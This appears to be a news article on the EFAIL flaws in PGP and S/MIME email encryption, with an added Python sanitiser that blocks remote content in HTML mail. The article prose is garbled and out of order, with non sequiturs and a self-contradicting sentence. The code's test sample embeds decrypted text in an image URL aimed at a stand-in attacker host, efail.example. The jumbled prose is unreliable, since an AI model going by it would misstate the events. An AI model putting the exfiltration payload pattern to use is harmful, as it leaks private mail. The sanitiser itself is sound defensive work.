To prevent a breach, the BSI said that users needed to secure access to their mailboxes and prevent their email clients from loading HTML content from external websites. The PGP CFB gadget attack was assigned CVE-2017-17688, while the S/MIME CBC vulnerability was given CVE-2017-17689. PGP encryption is used by some of the bigger email clients such as Apple Mail, Outlook, and Thunderbird. The researchers have already contacted email service providers through the Electronic Frontier Foundation.
In a message on the social networking site Twitter, security researcher Sebastian Schinzel has warned of "critical vulnerabilities in PGP/GPG and S/MIME email encryption," the details of which are being kept private until tomorrow morning.
When the victim's email client opens this email, it will decrypt the text, but also treat everything between the opened and closed image attribute tags as the source of the image. By also including the Web address of an attacker-controlled server, the newly sent emails can cause the programs to send the corresponding plaintext to the server.
Enigmail's Robert Hansen tweeted that "GnuPG has given warnings on missing/malformed [authentication encryption] for years". He recommended switching off HTML emails or using authenticated encryption. Will devs willingly fix their implementations of OpenPGP, or will authenticated encryption have to be made a mandatory part of using the protocol?
Yet others take issue with that line. It is one of the standard encryption program tools used for signing MIME data.
In any event, the issue appears to be more serious for S/MIME than it is for OpenPGP.
A more detailed explanation and analysis will be forthcoming once the research is formally released tomorrow, but the vulnerabilities are thought to affect both PGP and the S/MIME public key encryption standard. This is not surprising as PGP encryption has so far been considered rock solid.
As of now, there are not many details available on the latest vulnerability, but more information is expected to be shared by the researchers soon. On the other hand, S/MIME is used mainly in enterprise infrastructure. Because the HTML rendering engine is enabled, the mail client treats the decrypted message body as part of a URL, which it encodes and requests from the malicious actor's server, thereby leaking the message.
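The mechanism described above (decrypted text swallowed into an image URL that the client then fetches) is defeated by the mitigation the BSI and EFF recommend: never let the mail client load remote content. The following is an added example, not code from the article or from any of the mail clients it names, showing how a client-side sanitiser can rewrite every external `src`/`href` URL in an HTML mail body to a local placeholder before rendering and report what it blocked. The `efail.example` host and the decrypted text in the sample are constructed for illustration.

```python
"""Block remote resource loads in an HTML mail body before it is rendered.

Added example (not part of the original article). It implements the advice
"prevent email clients from loading HTML content from external websites" as
a sanitiser pass: any attribute that would trigger a network fetch is pointed
at about:blank and recorded, so a decrypted plaintext that has been wrapped
into a URL never leaves the machine.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

REMOTE_SCHEMES = {"http", "https", "ftp"}
# Attributes whose value a renderer may fetch automatically.
URL_ATTRS = {"src", "href", "background", "poster", "data"}
PLACEHOLDER = "about:blank"


def is_remote(url: str) -> bool:
    """True if the URL would cause a network request when rendered."""
    u = url.strip()
    if u.startswith("//"):          # scheme-relative URL, still remote
        return True
    return urlsplit(u).scheme.lower() in REMOTE_SCHEMES


class RemoteContentBlocker(HTMLParser):
    """Re-emits the HTML with every remote reference neutralised."""

    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out = []
        self.blocked = []           # (tag, attribute, original value)

    def _render_attrs(self, tag, attrs):
        parts = []
        for name, value in attrs:
            lname = name.lower()
            if value is not None and lname in URL_ATTRS and is_remote(value):
                self.blocked.append((tag, lname, value))
                value = PLACEHOLDER
            elif value is not None and lname == "style" and "url(" in value.lower():
                # CSS url() in an inline style is another fetch vector.
                self.blocked.append((tag, lname, value))
                value = ""
            if value is None:
                parts.append(f" {name}")
            else:
                parts.append(f' {name}="{escape(value, quote=True)}"')
        return "".join(parts)

    def handle_starttag(self, tag, attrs):
        self.out.append(f"<{tag}{self._render_attrs(tag, attrs)}>")

    def handle_startendtag(self, tag, attrs):
        self.out.append(f"<{tag}{self._render_attrs(tag, attrs)} />")

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")

    def handle_decl(self, decl):
        self.out.append(f"<!{decl}>")

    def handle_comment(self, data):
        pass                        # comments carry nothing the reader needs


def sanitize_html_mail(body: str):
    """Return (sanitised_html, blocked_references) for a decrypted mail body."""
    blocker = RemoteContentBlocker()
    blocker.feed(body)
    blocker.close()
    return "".join(blocker.out), blocker.blocked


# Constructed sample: an image whose src attribute opens before the decrypted
# text and closes after it, so the plaintext has become part of a remote URL.
SAMPLE_BODY = (
    '<p>Hi</p><img src="http://efail.example/\n'
    "Decrypted: the secret contract is signed\n"
    '">'
)

if __name__ == "__main__":
    clean, blocked = sanitize_html_mail(SAMPLE_BODY)
    print(clean)
    for tag, attr, value in blocked:
        print(f"blocked <{tag} {attr}> pointing at {value.splitlines()[0]!r}")
```

Rendering `clean` instead of the original body leaves the message readable while the fetch that would have carried the plaintext to `efail.example` never happens; the `blocked` list is what a client would surface to the user or log for review. The same pass leaves `cid:` references to inline attachments untouched, since those are resolved locally.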
The EFF, which in its alert published specific ways to disable it in specific clients, echoed the assessment.
A group of European security researchers have discovered vulnerabilities that could be exploited to "reveal the plaintext of encrypted emails", including those sent in the distant past, CSO reported.